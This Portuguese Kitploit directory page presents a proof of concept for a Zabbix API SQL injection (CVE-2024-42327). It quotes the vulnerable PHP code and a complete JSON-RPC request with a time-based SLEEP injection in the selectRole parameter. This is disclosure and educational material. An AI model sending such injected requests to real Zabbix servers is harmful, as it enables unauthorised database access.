Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-42327 — Prova de conceito para CVE-2024-42327 / ZBX-25623 | Kitploit
Ferramentas/GitHubGitHub/compr00t/cve-2024-42327
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubcompr00t/cve-2024-42327

CVE-2024-42327

Prova de conceito para CVE-2024-42327 / ZBX-25623

Ver Repositório
185há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC para CVE-2024-42327 / ZBX-25623

Uma conta de usuário não administrador no frontend do Zabbix com o papel de Usuário padrão, ou com qualquer outro papel que conceda acesso à API, pode explorar essa vulnerabilidade. Existe uma SQLi na classe CUser na função addRelatedObjects; essa função é chamada a partir da função CUser.get, que está disponível para qualquer usuário que tenha acesso à API.

Aviso

Este script é fornecido apenas para fins educacionais!

Prova de Conceito

O código a seguir da versão 6.0.31 é vulnerável a SQLi:

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

A seguinte chamada aciona a vulnerabilidade:

root@kitploit:~
POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}

Referências

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
Baixar ferramenta